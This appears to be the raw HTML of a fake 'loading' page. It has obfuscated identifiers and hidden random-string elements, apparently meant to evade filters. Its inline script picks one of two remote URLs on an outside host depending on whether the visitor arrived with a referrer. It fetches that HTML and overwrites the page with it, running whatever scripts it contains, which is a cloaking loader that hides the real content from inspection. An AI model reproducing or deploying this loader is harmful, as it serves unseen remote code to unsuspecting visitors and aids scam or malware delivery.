<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .uoi1bbYfOcy {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .uoi1bbYfOcy .vYXw4Q63 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .uoi1bbYfOcy .content {
            line-height: 50px;
            text-align: center
        }

        .uoi1bbYfOcy .img {
            width: 100%
        }

        .uoi1bbYfOcy .yCu2WP {
            text-align: center
        }

        .uoi1bbYfOcy .yCu2WP span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .uoi1bbYfOcy .yCu2WP span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .uoi1bbYfOcy .yCu2WP span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .uoi1bbYfOcy .yCu2WP span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .uoi1bbYfOcy .yCu2WP span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .uoi1bbYfOcy .yCu2WP span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .uoi1bbYfOcy .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function j38lejEeI9Tw(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var EDDpRo = j38lejEeI9Tw('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ EDDpRo +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ EDDpRo +".html?a=share";
		}
		
        rbwalSTZP=url+"#"+new Date().getTime();
        rbwalSTZP && function() {
            $.get(rbwalSTZP, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>vieroRgk14lpvVE0na8PETOs5dR6efmZKAec28hkqG8eOmo3B46fClCfY8dBLKdfDaCLfRKGxhWGRXM5Zi1aBO7hKKtXXtjIcW0OW</span>
<h1 style='display:none' >Ud3eu7UtFSB1MgPmM22oww</h1>
<div style='display:none'>fc5zp5a5cooK4IlRtSw0ewph9XopqqkZOHOng6spTY7puUsXihJLIZMByOL7fzGoqE</div>
<div style='display:none'>fc5zp5a5cooK4IlRtSw0ewph9XopqqkZOHOng6spTY7puUsXihJLIZMByOL7fzGoqE</div>
<li style='display:none' >Gw7ogTM4X3j6lwnJ7LgZ8Dh0srBCxmLMvpaXVgQqhD8fLfg</li>
<h1 style='display:none' >Ud3eu7UtFSB1MgPmM22oww</h1>
<ul style='display:none' >UJswlzjxET03j9t92wUrMhqfYvvbIyXuaHk7126VQZI9jVq1MWK61QrjnjcWnnfHfAmAyTbNTOV49jjvYM22y9bnazjefUmm</ul>
<a  href='#' style='display:none'>cZvotgo3zs8CSH5</a>
<span style='display:none'>vieroRgk14lpvVE0na8PETOs5dR6efmZKAec28hkqG8eOmo3B46fClCfY8dBLKdfDaCLfRKGxhWGRXM5Zi1aBO7hKKtXXtjIcW0OW</span>
<h1 style='display:none' >Ud3eu7UtFSB1MgPmM22oww</h1><div class="uoi1bbYfOcy">
    <div class="vYXw4Q63">
        <div class="yCu2WP">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >JHZZKXGd57eiz9US4MW79RYrYkDxDFmZmT2Rsmg1azPGqET</b>
<h1 style='display:none' >D9GwIlEOoZNm6fnFyaLqKSo9TRCFh5ApjemVLclV</h1>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<ul style='display:none' >TLY8SxCu8TNvm4J7DQuyO0rkBbGzj4ZKGtBqxTx1IdF</ul>
<div style='display:none'>xjj9rPJDh5Jz</div></body>
</html>